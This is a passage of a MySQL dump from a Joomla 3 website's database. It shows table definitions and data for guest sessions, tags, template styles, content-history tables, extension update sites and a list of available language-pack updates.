'f9f4c8595c99d71e27d9ff8cca768c38',0,1,1663907489,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwNzQ4OTtzOjQ6Imxhc3QiO2k6MTY2MzkwNzQ4OTtzOjM6Im5vdyI7aToxNjYzOTA3NDg5O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,''),(_binary 'fc927092aa05204899d7620c2d04b826',0,1,1663907495,'joomla|s:664:\"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjI6e3M6NzoiY291bnRlciI7aToxO3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTY2MzkwNzQ5NTtzOjQ6Imxhc3QiO2k6MTY2MzkwNzQ5NTtzOjM6Im5vdyI7aToxNjYzOTA3NDk1O319czo4OiJyZWdpc3RyeSI7TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjA6e31zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO31zOjQ6InVzZXIiO086MjA6Ikpvb21sYVxDTVNcVXNlclxVc2VyIjoxOntzOjI6ImlkIjtpOjA7fX19czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MDtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9\";',0,'');
/*!40000 ALTER TABLE `j25_session` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_tags`
--

DROP TABLE IF EXISTS `j25_tags`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_tags` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `parent_id` int(10) unsigned NOT NULL DEFAULT '0',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `level` int(10) unsigned NOT NULL DEFAULT '0',
  `path` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The meta description for the page.',
  `metakey` varchar(1024) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The meta keywords for the page.',
  `metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded metadata properties.',
  `created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `urls` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`id`),
  KEY `tag_idx` (`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_path` (`path`(100)),
  KEY `idx_alias` (`alias`(100))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_tags`
--

LOCK TABLES `j25_tags` WRITE;
/*!40000 ALTER TABLE `j25_tags` DISABLE KEYS */;
INSERT INTO `j25_tags` VALUES (1,0,0,1,0,'','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',0,'2011-01-01 00:00:01','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00');
/*!40000 ALTER TABLE `j25_tags` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_template_styles`
--

DROP TABLE IF EXISTS `j25_template_styles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_template_styles` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `template` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `home` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `inheritable` tinyint(4) NOT NULL DEFAULT '0',
  `parent` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `idx_template` (`template`),
  KEY `idx_client_id` (`client_id`),
  KEY `idx_client_id_home` (`client_id`,`home`)
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_template_styles`
--

LOCK TABLES `j25_template_styles` WRITE;
/*!40000 ALTER TABLE `j25_template_styles` DISABLE KEYS */;
INSERT INTO `j25_template_styles` VALUES (2,'bluestork',1,'0','Bluestork - Default','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\"}',0,''),(3,'atomic',0,'0','Atomic - Default','{}',0,''),(4,'beez_20',0,'0','Beez2 - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/joomla_black.gif\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"templatecolor\":\"personal\",\"html5\":\"0\"}',0,''),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"colourChoice\":\"\",\"boldText\":\"0\"}',0,''),(6,'beez5',0,'0','Beez5 - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/sampledata\\/fruitshop\\/fruits.gif\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"html5\":\"0\"}',0,''),(7,'gk_ilife',0,'1','gk_ilife','',0,''),(8,'ja_purity',0,'0','ja_purity','',0,''),(9,'rhuk_milkyway',0,'0','rhuk_milkyway','',0,''),(10,'gk_ilife',0,'0','gk_ilife_25 - Default','{}',0,''),(11,'protostar',0,'0','protostar - Default','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}',0,''),(12,'isis',1,'1','isis - Default','{\"templateColor\":\"#10222e\",\"headerColor\":\"#1a3867\",\"sidebarColor\":\"#0088cc\",\"linkColor\":\"#0088cc\",\"logoFile\":\"\",\"loginLogoFile\":\"\",\"admin_menus\":1,\"displayHeader\":1,\"statusFixed\":1,\"stickyToolbar\":1}',0,''),(13,'beez3',0,'0','beez3 - Default','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"bootstrap\":\"\",\"templatecolor\":\"nature\",\"headerImage\":\"\",\"backgroundcolor\":\"#eee\"}',0,'');
/*!40000 ALTER TABLE `j25_template_styles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_ucm_base`
--

DROP TABLE IF EXISTS `j25_ucm_base`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_ucm_base` (
  `ucm_id` int(10) unsigned NOT NULL,
  `ucm_item_id` int(10) NOT NULL,
  `ucm_type_id` int(11) NOT NULL,
  `ucm_language_id` int(11) NOT NULL,
  PRIMARY KEY (`ucm_id`),
  KEY `idx_ucm_item_id` (`ucm_item_id`),
  KEY `idx_ucm_type_id` (`ucm_type_id`),
  KEY `idx_ucm_language_id` (`ucm_language_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_ucm_base`
--

LOCK TABLES `j25_ucm_base` WRITE;
/*!40000 ALTER TABLE `j25_ucm_base` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_ucm_base` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_ucm_content`
--

DROP TABLE IF EXISTS `j25_ucm_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_ucm_content` (
  `core_content_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `core_type_alias` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'FK to the content types table',
  `core_title` varchar(400) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `core_body` mediumtext COLLATE utf8mb4_unicode_ci,
  `core_state` tinyint(1) NOT NULL DEFAULT '0',
  `core_checked_out_time` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_checked_out_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `core_access` int(10) unsigned NOT NULL DEFAULT '0',
  `core_params` text COLLATE utf8mb4_unicode_ci,
  `core_featured` tinyint(4) unsigned NOT NULL DEFAULT '0',
  `core_metadata` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'JSON encoded metadata properties.',
  `core_created_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `core_created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_modified_user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Most recent user that modified',
  `core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `core_publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `core_content_item_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'ID from the individual type table',
  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `core_images` text COLLATE utf8mb4_unicode_ci,
  `core_urls` text COLLATE utf8mb4_unicode_ci,
  `core_hits` int(10) unsigned NOT NULL DEFAULT '0',
  `core_version` int(10) unsigned NOT NULL DEFAULT '1',
  `core_ordering` int(11) NOT NULL DEFAULT '0',
  `core_metakey` text COLLATE utf8mb4_unicode_ci,
  `core_metadesc` text COLLATE utf8mb4_unicode_ci,
  `core_catid` int(10) unsigned NOT NULL DEFAULT '0',
  `core_xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'A reference to enable linkages to external data sets.',
  `core_type_id` int(10) unsigned NOT NULL DEFAULT '0',
  PRIMARY KEY (`core_content_id`),
  KEY `tag_idx` (`core_state`,`core_access`),
  KEY `idx_access` (`core_access`),
  KEY `idx_language` (`core_language`),
  KEY `idx_modified_time` (`core_modified_time`),
  KEY `idx_created_time` (`core_created_time`),
  KEY `idx_core_modified_user_id` (`core_modified_user_id`),
  KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`),
  KEY `idx_core_created_user_id` (`core_created_user_id`),
  KEY `idx_core_type_id` (`core_type_id`),
  KEY `idx_alias` (`core_alias`(100)),
  KEY `idx_title` (`core_title`(100)),
  KEY `idx_content_type` (`core_type_alias`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Contains core content data in name spaced fields';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_ucm_content`
--

LOCK TABLES `j25_ucm_content` WRITE;
/*!40000 ALTER TABLE `j25_ucm_content` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_ucm_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_ucm_history`
--

DROP TABLE IF EXISTS `j25_ucm_history`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_ucm_history` (
  `version_id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `ucm_item_id` int(10) unsigned NOT NULL,
  `ucm_type_id` int(10) unsigned NOT NULL,
  `version_note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'Optional version name',
  `save_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor_user_id` int(10) unsigned NOT NULL DEFAULT '0',
  `character_count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Number of characters in this version.',
  `sha1_hash` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '' COMMENT 'SHA1 hash of the version_data column.',
  `version_data` longtext COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'json-encoded string of version data',
  `keep_forever` tinyint(4) NOT NULL DEFAULT '0' COMMENT '0=auto delete; 1=keep',
  PRIMARY KEY (`version_id`),
  KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`),
  KEY `idx_save_date` (`save_date`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_ucm_history`
--

LOCK TABLES `j25_ucm_history` WRITE;
/*!40000 ALTER TABLE `j25_ucm_history` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_ucm_history` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_update_sites`
--

DROP TABLE IF EXISTS `j25_update_sites`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_update_sites` (
  `update_site_id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `type` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `location` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `enabled` int(11) DEFAULT '0',
  `last_check_timestamp` bigint(20) DEFAULT '0',
  `extra_query` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`update_site_id`)
) ENGINE=InnoDB AUTO_INCREMENT=35 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Update Sites';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_update_sites`
--

LOCK TABLES `j25_update_sites` WRITE;
/*!40000 ALTER TABLE `j25_update_sites` DISABLE KEYS */;
INSERT INTO `j25_update_sites` VALUES (1,'Joomla! Core','collection','https://update.joomla.org/core/list.xml',1,1663896418,''),(3,'Accredited Joomla! Translations','collection','https://update.joomla.org/language/translationlist_3.xml',1,1663659944,''),(4,'Joomla! Update Component Update Site','extension','https://update.joomla.org/core/extensions/com_joomlaupdate.xml',1,1663659944,''),(5,'Weblinks Update Site','extension','https://raw.githubusercontent.com/joomla-extensions/weblinks/master/manifest.xml',1,1663659944,''),(6,'mavikthumbnails','extension','http://www.mavik.com.ua/download/mavikthumbnails2-update.xml',1,1663659944,''),(7,'Admin Tools Core','extension','http://cdn.akeebabackup.com/updates/atcore.xml',1,1663659944,''),(9,'Securitycheck Update Site','extension','http://securitycheck.protegetuordenador.com/update/updates_securitycheck.xml',0,0,''),(10,'WebInstaller Update Site','extension','http://appscdn.joomla.org/webapps/jedapps/webinstaller.xml',1,1663659945,''),(11,'Freestyle Testimonials Updates','collection','http://www.freestyle-joomla.com/update/list.php?com=fst',1,1663659945,''),(12,'JCE Editor Updates','extension','https://www.joomlacontenteditor.net/index.php?option=com_updates&view=update&format=xml&id=1&file=extension.xml',1,1663659946,''),(13,'JCE MediaBox Updates','extension','https://www.joomlacontenteditor.net/index.php?option=com_updates&view=update&format=xml&id=3&file=extension.xml',1,1663659946,''),(19,'Joomline','extension','http://joomline.net/index.php?option=com_ars&view=update&task=stream&format=xml&id=10&dummy=extension.xml',1,1663659946,''),(20,'WebInstaller Update Site','extension','https://appscdn.joomla.org/webapps/jedapps/webinstaller.xml',1,1663659947,''),(21,'FOF 3.x','extension','http://cdn.akeebabackup.com/updates/fof3.xml',1,1663659947,''),(22,'Akeeba FEF','extension','http://cdn.akeebabackup.com/updates/fef.xml',1,1663659947,''),(24,'Joomline','extension','https://joomline.net/index.php?option=com_ars&view=update&task=stream&format=xml&id=10&dummy=extension.xml',1,1663659947,''),(25,'FOF 4.x','extension','http://cdn.akeeba.com/updates/fof4_file.xml',1,1663659947,''),(26,'Akeeba FEF','extension','http://cdn.akeeba.com/updates/fef.xml',1,1663659947,''),(27,'Akeeba Backup Core','extension','https://cdn.akeeba.com/updates/pkgakeebacore.xml',1,1663659947,''),(28,'JCE MediaBox Updates','extension','https://www.joomlacontenteditor.net/index.php?option=com_updates&view=update&format=xml&file=jcemediabox.xml',1,1663659948,''),(29,'JL No Doubles','extension','https://joomline.net/update.html?extension_id=4.xml',1,1663659948,''),(31,'JCH Optimize Updates','extension','https://www.jch-optimize.net/index.php?option=com_ars&view=update&task=stream&format=xml&id=5&file=extension.xml',1,1663659949,''),(32,'JCH Optimize Updates','extension','https://www.jch-optimize.net/index.php?option=com_ars&view=update&task=stream&format=xml&id=4&file=extension.xml',1,1663659949,''),(33,'JCE MediaBox Updates','extension','https://cdn.joomlacontenteditor.net/updates/xml/mediabox/plg_system_jcemediabox2.xml',1,1663659950,''),(34,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist_3.xml',1,1663659950,'');
/*!40000 ALTER TABLE `j25_update_sites` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_update_sites_extensions`
--

DROP TABLE IF EXISTS `j25_update_sites_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_update_sites_extensions` (
  `update_site_id` int(11) NOT NULL DEFAULT '0',
  `extension_id` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`update_site_id`,`extension_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Links extensions to update sites';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_update_sites_extensions`
--

LOCK TABLES `j25_update_sites_extensions` WRITE;
/*!40000 ALTER TABLE `j25_update_sites_extensions` DISABLE KEYS */;
INSERT INTO `j25_update_sites_extensions` VALUES (1,700),(3,802),(3,10007),(4,28),(5,801),(6,10041),(7,10042),(9,10049),(10,10052),(11,10053),(12,10056),(13,10060),(19,10078),(20,10052),(21,10079),(22,10080),(24,10078),(25,10081),(26,10080),(27,10076),(28,10060),(29,10078),(31,10090),(32,10090),(33,10060),(34,10097);
/*!40000 ALTER TABLE `j25_update_sites_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_updates`
--

DROP TABLE IF EXISTS `j25_updates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_updates` (
  `update_id` int(11) NOT NULL AUTO_INCREMENT,
  `update_site_id` int(11) DEFAULT '0',
  `extension_id` int(11) DEFAULT '0',
  `name` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `element` varchar(100) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `type` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `folder` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `client_id` tinyint(3) DEFAULT '0',
  `version` varchar(32) COLLATE utf8mb4_unicode_ci DEFAULT '',
  `data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `detailsurl` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `infourl` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `extra_query` varchar(1000) COLLATE utf8mb4_unicode_ci DEFAULT '',
  PRIMARY KEY (`update_id`)
) ENGINE=InnoDB AUTO_INCREMENT=6443 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci COMMENT='Available Updates';
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_updates`
--

LOCK TABLES `j25_updates` WRITE;
/*!40000 ALTER TABLE `j25_updates` DISABLE KEYS */;
INSERT INTO `j25_updates` VALUES (6366,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(6367,3,0,'Albanian','','pkg_sq-AL','package','',0,'3.1.1.2','','https://update.joomla.org/language/details3/sq-AL_details.xml','',''),(6368,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.27.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(6369,3,0,'Armenian','','pkg_hy-AM','package','',0,'3.4.4.1','','https://update.joomla.org/language/details3/hy-AM_details.xml','',''),(6370,3,0,'Basque','','pkg_eu-ES','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/eu-ES_details.xml','',''),(6371,3,0,'Belarusian','','pkg_be-BY','package','',0,'3.2.1.2','','https://update.joomla.org/language/details3/be-BY_details.xml','',''),(6372,3,0,'Bengali, Bangladesh','','pkg_bn-BD','package','',0,'3.8.10.1','','https://update.joomla.org/language/details3/bn-BD_details.xml','',''),(6373,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.24.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(6374,3,0,'Bulgarian','','pkg_bg-BG','package','',0,'3.6.5.2','','https://update.joomla.org/language/details3/bg-BG_details.xml','',''),(6375,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(6376,3,0,'Chinese, Simplified','','pkg_zh-CN','package','',0,'3.10.6.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(6377,3,0,'Chinese, Traditional','','pkg_zh-TW','package','',0,'3.8.0.1','','https://update.joomla.org/language/details3/zh-TW_details.xml','',''),(6378,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(6379,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(6380,3,0,'Danish','','pkg_da-DK','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(6381,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(6382,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(6383,3,0,'Dzongkha','','pkg_dz-BT','package','',0,'3.6.2.1','','https://update.joomla.org/language/details3/dz-BT_details.xml','',''),(6384,3,0,'English, Australia','','pkg_en-AU','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(6385,3,0,'English, Canada','','pkg_en-CA','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(6386,3,0,'English, New Zealand','','pkg_en-NZ','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(6387,3,0,'English, USA','','pkg_en-US','package','',0,'3.9.28.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(6388,3,0,'Esperanto','','pkg_eo-XX','package','',0,'3.8.11.1','','https://update.joomla.org/language/details3/eo-XX_details.xml','',''),(6389,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(6390,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(6391,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(6392,3,0,'French','','pkg_fr-FR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(6393,3,0,'French, Canada','','pkg_fr-CA','package','',0,'3.6.5.1','','https://update.joomla.org/language/details3/fr-CA_details.xml','',''),(6394,3,0,'Galician','','pkg_gl-ES','package','',0,'3.3.1.2','','https://update.joomla.org/language/details3/gl-ES_details.xml','',''),(6395,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(6396,3,0,'German','','pkg_de-DE','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(6397,3,0,'German, Austria','','pkg_de-AT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(6398,3,0,'German, Liechtenstein','','pkg_de-LI','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(6399,3,0,'German, Luxembourg','','pkg_de-LU','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(6400,3,0,'German, Switzerland','','pkg_de-CH','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(6401,3,0,'Greek','','pkg_el-GR','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(6402,3,0,'Hebrew','','pkg_he-IL','package','',0,'3.1.1.2','','https://update.joomla.org/language/details3/he-IL_details.xml','',''),(6403,3,0,'Hindi, India','','pkg_hi-IN','package','',0,'3.3.6.2','','https://update.joomla.org/language/details3/hi-IN_details.xml','',''),(6404,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.10.10.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(6405,3,0,'Indonesian, Bahasa Indonesia','','pkg_id-ID','package','',0,'3.6.2.1','','https://update.joomla.org/language/details3/id-ID_details.xml','',''),(6406,3,0,'Irish','','pkg_ga-IE','package','',0,'3.8.13.1','','https://update.joomla.org/language/details3/ga-IE_details.xml','',''),(6407,3,0,'Italian','','pkg_it-IT','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(6408,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.10.11.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(6409,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.23.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(6410,3,0,'Khmer','','pkg_km-KH','package','',0,'3.4.5.1','','https://update.joomla.org/language/details3/km-KH_details.xml','',''),(6411,3,0,'Korean','','pkg_ko-KR','package','',0,'3.8.9.1','','https://update.joomla.org/language/details3/ko-KR_details.xml','',''),(6412,3,0,'Latvian','','pkg_lv-LV','package','',0,'3.9.25.2','','https://update.joomla.org/language/details3/lv-LV_details.xml','',''),(6413,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/l